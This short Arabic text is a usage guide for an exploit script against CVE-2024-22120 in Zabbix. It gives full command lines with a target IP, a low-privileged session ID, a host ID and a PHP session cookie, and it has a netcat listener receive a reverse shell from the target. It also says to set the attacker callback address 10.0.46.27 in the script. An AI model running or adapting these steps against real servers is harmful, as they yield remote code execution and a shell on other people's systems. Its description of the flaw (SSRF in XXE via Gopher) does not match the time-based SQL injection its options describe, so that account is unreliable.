
هذا هو الإكسبلويت الخاص بي لـ CVE-2024-22120، والذي يتضمن ثغرة SSRF داخل XXE مع حمولة Gopher.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
لقد حددت خادم Zabbix يعمل على العنوان IP 192.168.1.100، ولديك وصول إلى مستخدم منخفض الامتياز بالتفاصيل التالية:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gتريد استغلال ثغرة RCE باستخدام هذا السكربت.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: عنوان IP الخاص بخادم Zabbix.--sid d82bf6715e1d3c1f25: معرف الجلسة لمستخدم منخفض الامتياز.--hostid 10107: معرّف المضيف الذي يمكن للمستخدم منخفض الامتياز الوصول إليه.--phpsessid a4g7f48d9j3r7h8s9g: معرف جلسة PHP المستخدم لمصادقة الطلبات.--false_time 1: الوقت بالثواني للانتظار في حالة التخمين الخاطئ أثناء حقن SQL (الافتراضي هو ثانية واحدة).--true_time 3: الوقت بالثواني للانتظار في حالة التخمين الصحيح أثناء حقن SQL (الافتراضي هو 3 ثوانٍ).10.0.46.27:5555 داخل السكربت).تأكد من أن جهازك يستمع على المنفذ المحدد (5555 داخل السكربت) لاستقبال الشل العكسي. يمكنك استخدام netcat لذلك:
nc -lvnp 5555
استبدل العنوان IP 10.0.46.27 والمنفذ 5555 داخل دالة CreateScript بعنوان IP الخاص بك والمنفذ المطلوب لاستقبال الشل العكسي.